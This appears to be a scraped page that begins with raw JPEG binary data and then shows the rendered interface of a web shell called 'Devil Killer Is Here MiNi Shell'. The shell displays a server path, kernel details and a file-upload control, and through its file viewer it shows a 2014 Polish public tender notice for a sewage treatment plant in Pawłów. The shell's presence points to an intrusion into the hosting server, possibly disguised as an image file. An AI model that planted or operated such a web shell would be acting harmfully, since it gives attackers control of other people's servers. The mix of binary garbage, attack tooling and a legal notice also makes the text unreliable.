JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140128/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140128/31094-N-2014.html

<p class="kh_header"><b>Chlewiska: Budowa oczyszczalni ścieków w miejscowości Pawłów gm. Chlewiska</b><br>
<b>Numer ogłoszenia: 31094 - 2014; data zamieszczenia: 28.01.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Chlewiska , ul. Czachowskiego 49, 25-510 Chlewiska, woj. mazowieckie, tel. 48 6287054, faks 48 6287271.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.chlewiska.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa oczyszczalni ścieków w miejscowości Pawłów gm. Chlewiska.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są roboty budowlane polegające na budowie oczyszczalni ścieków o przepustowości średniej 280m3/d w technologii SBR w miejscowości Pawłów gm. Chlewiska. 
Zakres robót obejmuje w szczególności wykonanie następujących obiektów                           i instalacji:
1) punkt zlewny ścieków dowożonych,
2) przepompownia wewnętrzna,
3) budynek techniczno socjalny wraz z niezbędnymi urządzeniami i obiektami technologicznymi, w tym:
 - część socjalna,
- sito z piaskownikiem,
- zbiorniki retencyjne,
- reaktory biologiczne osadu czynnego typu SBR,
- instalacja sprężonego powietrza,
- zbiornik osadu do tlenowej stabilizacji osadu,
- instalacja do odwadniania osadu,
- zbiornik PIX z instalacją,
- instalacje wod-kan, ogrzewania i wentylacji,
- instalacje elektryczne i AKP;
4) przewody wodociągowe, z przewodem doprowadzającym wodę do oczyszczalni,
5) przewody kanalizacyjne na terenie projektowanej oczyszczalni,
6) przewody sprężonego powietrza,
7) przewody odprowadzające ścieki oczyszczone,
8) przewody elektryczne i AKP, z kablem doprowadzającym energię na teren oczyszczalni,
9) drogi i place,
10) ogrodzenie z zagospodarowaniem terenu oczyszczalni (zieleń).
Zamówienie obejmuje również wykonanie rozruchu technologicznego oczyszczalni  wraz z uzyskaniem efektu ekologicznego oraz przeprowadzenie szkolenia w zakresie jej obsługi.
Szczegółowy opis przedmiotu zamówienia zawiera dokumentacja opracowana przez   firmę BIOWOMA Iwona Regulska w skład której wchodzi dokumentacja projektowa (projekt budowlany zawierający wszystkie branże objęte przedmiotem zamówienia,    w tym informacja BIOZ, geologia, decyzja środowiskowa,  pozwolenie wodno prawne; branżowe projekty wykonawcze; branżowe przedmiary robót) oraz szczegółowe specyfikacje techniczne wykonania i odbioru robót. Dokumentacja opisująca przedmiot zamówienia stanowi załącznik nr  1 do SIWZ.
Na wykonywanie robót objętych zamówieniem Zamawiający posiada aktualne pozwolenie na budowę wydane przez Starostę Szydłowieckiego (Decyzja Nr 52.2013 z dnia 10.04.2013 r.) - załącznik nr 2 do SIWZ. 
Wszystkie materiały, urządzenia i sprzęt niezbędny do wykonania przedmiotu zamówienia zapewnia Wykonawca. 
	Zaleca się, by wycena oferty poprzedzona była wizją lokalną w celu uwzględnienia  	wszystkich kosztów i czynności niezbędnych do prawidłowego wykonania przedmiotu 	zamówienia.
	Przedmiot zamówienia będzie realizowany zgodnie z postanowieniami i na warunkach
określonych w projekcie umowy stanowiącym załącznik nr 10 do SIWZ.

Uwaga!
Jeżeli dokumentacja projektowa lub specyfikacja techniczna wykonania i odbioru robót budowlanych wskazywałyby w odniesieniu do niektórych materiałów lub urządzeń znaki towarowe, patenty lub pochodzenie - zamawiający, zgodnie z art. 29 ust. 3 Pzp, dopuszcza oferowanie materiałów lub urządzeń równoważnych. Materiały lub urządzenia pochodzące od konkretnych producentów określają minimalne parametry jakościowe i cechy użytkowe, jakim muszą odpowiadać materiały lub urządzenia oferowane przez wykonawcę, aby zostały spełnione wymagania stawiane przez zamawiającego. Materiały lub urządzenia pochodzące od konkretnych producentów stanowią wyłącznie wzorzec jakościowy przedmiotu zamówienia. Pod pojęciem minimalne parametry jakościowe i cechy użytkowe zamawiający rozumie wymagania dotyczące materiałów lub urządzeń zawarte w ogólnie dostępnych źródłach, katalogach, stronach internetowych producentów. Operowanie przykładowymi nazwami producenta ma jedynie na celu doprecyzowanie poziomu oczekiwań zamawiającego w stosunku do określonego rozwiązania. Posługiwanie się nazwami producentów/produktów ma wyłącznie charakter przykładowy. Zamawiający, wskazując oznaczenie konkretnego producenta (dostawcy) lub konkretny produkt przy opisie przedmiotu zamówienia, dopuszcza jednocześnie produkty równoważne o parametrach jakościowych i cechach użytkowych co najmniej na poziomie parametrów wskazanego produktu, uznając tym samym każdy produkt o wskazanych lub lepszych parametrach. 
W takiej sytuacji zamawiający wymaga złożenia stosownych dokumentów, uwiarygodniających te materiały lub urządzenia. 
Zamawiający zastrzega sobie prawo wystąpienia do autora dokumentacji projektowej o opinię na temat oferowanych materiałów lub urządzeń. Opinia ta może stanowić podstawę do podjęcia przez zamawiającego decyzji o przyjęciu materiałów lub urządzeń równoważnych albo odrzuceniu oferty z powodu braku równoważności.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.20.00.00-9, 45.10.00.00-8, 45.40.00.00-1, 45.23.30.00-9, 45.31.73.00-5, 45.31.11.00-1, 45.31.12.00-2, 45.23.14.00-9, 45.31.61.00-6, 45.23.24.21-9, 45.23.24.23-3, 45.23.13.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający  żąda wniesienia wadium w kwocie  50.000,00 zł (pięćdziesiąt tysięcy złotych) przed upływem terminu składania ofert w formach określonych w art. 45 ust. 6 Pzp, tj.:
	1) pieniądzu;
	2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo -	kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
	3) gwarancjach bankowych;
	4) gwarancjach ubezpieczeniowych;
	5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust.5 pkt 2 	ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju 	Przedsiębiorczości (Dz.U. z 2007 r. Nr 42, poz. 275 z późniejszymi zmianami)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia                            o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeśli wykonawca wykaże, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy,  w tym okresie, wykonał (zakończył) w sposób należyty, zgodnie z zasadami sztuki budowlanej i prawidłowo ukończył, co najmniej dwie roboty budowlane polegające na budowie oczyszczalni ścieków o przepustowości minimum 250 m3/d każda, w tym minimum jedną oczyszczalnię w technologii SBR            o wartości minimum 2 500 000,00 zł brutto każda.

Wartości podane w dokumentach potwierdzających spełnienie powyższego warunku w walutach innych niż PLN Wykonawca przeliczy wg średniego kursu NBP na dzień  zakończenia wykonania robót (data spisania protokołu odbioru lub inny równoważny dokument)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli wykonawca wykaże, że dysponuje lub będzie dysponował osobami, które uczestniczyć będą w wykonywaniu zamówienia, uprawnionymi do pełnienia samodzielnych funkcji technicznych w budownictwie, posiadającymi uprawnienia budowlane do kierowania robotami budowlanymi w specjalnościach:
-  instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych bez ograniczeń (kierownik budowy);
- instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych                                        i elektroenergetycznych bez ograniczeń (kierownik robót);
- konstrukcyjno-budowlanej bez ograniczeń (kierownik robót);
- drogowej (kierownik robót)
określone ustawą z dnia 7 lipca 1994 - Prawo budowlane (Dz. U. z 2013 r., poz. 1409 z późn. zm.) lub inne odpowiadające im, co do zakresu obejmującego przedmiot zamówienia, ważne uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów.
Ponadto Wykonawca przedłoży oświadczenie, że wskazane osoby posiadają wymagane uprawnienia budowlane.	

Zgodnie z art. 12a ustawy Prawo budowlane samodzielne funkcje techniczne                        w budownictwie mogą również wykonywać osoby, których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych (m.in.                w ustawie z dnia 18.03.2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej). 

Zamawiający dopuszcza pełnienie jednocześnie funkcji kierownika budowy i/lub kierownika(ów) robót przez jedną osobę pod warunkiem posiadania uprawnień                          w wymaganych branżach.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że posiada:
1)	 środki finansowe lub zdolność kredytową w wysokości co najmniej 2 000 000,00 PLN,
2)	opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę minimum 2.500.000,00 PLN.

Jeżeli dokumenty potwierdzające spełnienie niniejszego warunku będą określały wartość w walucie obcej to Zamawiający przeliczy tą wartość na PLN wg średniego kursu NBP na dzień którego określona wartość się odnosi</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Formularz Oferty sporządzony zgodnie z załącznikiem nr 3 do SIWZ. 
	  	2) Pełnomocnictwo, jeżeli osoba/y podpisujące ofertę działają na podstawie  pełnomocnictwa. Pełnomocnictwo to musi w swej treści jednoznacznie wskazywać uprawnienie do podpisania oferty.
	    
3) Pełnomocnictwo 	do reprezentowania Wykonawców w postępowaniu albo                     reprezentowania w postępowaniu i zawarcia umowy w przypadku wspólnego ubiegania się o udzielenie zamówienia.
      
	4) Pisemne zobowiązanie innych podmiotów do oddania do dyspozycji Wykonawcy niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia w przypadku gdy Wykonawca  wykazując spełnianie warunków udziału w postępowaniu polega na zasobach tych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy Pzp.  Wykonawca w takiej sytuacji  zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia                     w stopniu niezbędnym dla należytego wykonania zamówienia oraz, że stosunek łączący Wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów.  W przypadku polegania  na doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia należy złożyć dokumenty dotyczące:

a) zakresu dostępnych wykonawcy zasobów innego podmiotu;
b) sposobu wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu zamówienia;
c) charakteru stosunku, jaki będzie łączył wykonawcę z innym podmiotem;
d) zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia.

 5) Dowód wniesienia wadium.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.  Istotne dla stron postanowienia umowy, w tym dopuszczalne zmiany umowy zostały zawarte w projekcie umowy - załącznik nr 10 do SIWZ.

	Zgodnie z art. 144 ustawy Pzp przewiduje się następujące zmiany umowy:  
	I. Zmiany w zakresie terminu wykonania zamówienia
	 1. Termin zakończenia robót może ulec przesunięciu w przypadku wystąpienia opóźnień wynikających z:  
	a)	przestojów i opóźnień zawinionych przez Zamawiającego;
	b)	działania siły wyższej (np. klęski żywiołowe, strajki generalne lub lokalne), mającego bezpośredni wpływ na terminowość wykonywania robót;
	c)	wystąpienia warunków atmosferycznych uniemożliwiających wykonywanie robót - fakt ten musi zostać udokumentowany  wpisem kierownika budowy do dziennika budowy oraz zgłoszony niezwłocznie Zamawiającemu; 
	d)	wystąpienia okoliczności, których strony umowy nie były w stanie przewidzieć, pomimo zachowania należytej staranności;
	e)	wykopalisk uniemożliwiających wykonywanie robót;
	f) podpisania umowy na zamówienia dodatkowe, o których mowa w art. 67 ust. 1 pkt 5 Prawa zamówień publicznych, o ile wykonywanie tych zamówień wpływa na termin wykonania niniejszej umowy;
	g)	wystąpienia istotnego błędu w dokumentacji projektowej - termin umowny może zostać wydłużony o czas niezbędny na usunięcie wad w projekcie przez Wykonawcę dokumentacji projektowej.
	2. Opóźnienia, o których mowa w pkt. 1 muszą być odnotowane w dzienniku budowy, udokumentowane stosownymi protokołami podpisanymi przez kierownika budowy oraz zaakceptowane przez Zamawiającego. 
	3. W przedstawionych w pkt. 1 przypadkach wystąpienia opóźnień, strony ustalą nowe terminy, z tym że maksymalny okres przesunięcia terminu zakończenia realizacji przedmiotu umowy równy będzie okresowi przerwy lub postoju.
	II. Zmiany dotyczące zakresu rzeczowego i wynagrodzenia:
	1. Zamawiający dopuszcza możliwość wystąpienia w trakcie realizacji przedmiotu 	umowy konieczności 	wykonania robót zamiennych w stosunku do przewidzianych 	dokumentacją projektową w sytuacji, gdy 	wykonanie tych robót będzie niezbędne do 	prawidłowego, tj.  zgodnego z zasadami wiedzy technicznej i obowiązującymi na 	dzień odbioru robót przepisami, wykonania przedmiotu umowy.  
	2.	Przewiduje się także możliwość rezygnacji z wykonywania części (elementów) 	przedmiotu umowy 	przewidzianych w dokumentacji projektowej w sytuacji, gdy ich 	wykonanie będzie zbędne do 	prawidłowego, tj. zgodnego z zasadami wiedzy 	technicznej i obowiązującymi na  dzień odbioru robót 	przepisami, wykonania 	przedmiotu umowy. Roboty takie w dalszej części umowy nazywane są -robotami 	zaniechanymi-. Wyliczenie wartości 	tych robót  nastąpi 	na podstawie 	kosztorysu ofertowego sporządzonego przez 	Wykonawcę przed podpisaniem 	umowy  i zatwierdzonego 	przez 	Zamawiającego, będącego załącznikiem do 	umowy. W 	przypadku 	braku 	możliwości 	dokonania rozliczeń na podstawie 	powyższego kosztorysu 	rozliczenie robót nastąpi w oparciu o zeszyty  	SEKOCENBUD dla kwartału 	poprzedzającego 	sporządzenie wyceny oraz 	nakładów    	rzeczowych 	określonych w Katalogach Nakładów 	Rzeczowych 	(KNR), a w przypadku robót, 	dla których 	nie 	określono nakładów 	rzeczowych                    	w 	KNR, 	wg innych 	ogólnie stosowanych 	katalogów lub 	nakładów 	własnych 	zaakceptowanych 	przez 	Zamawiającego.
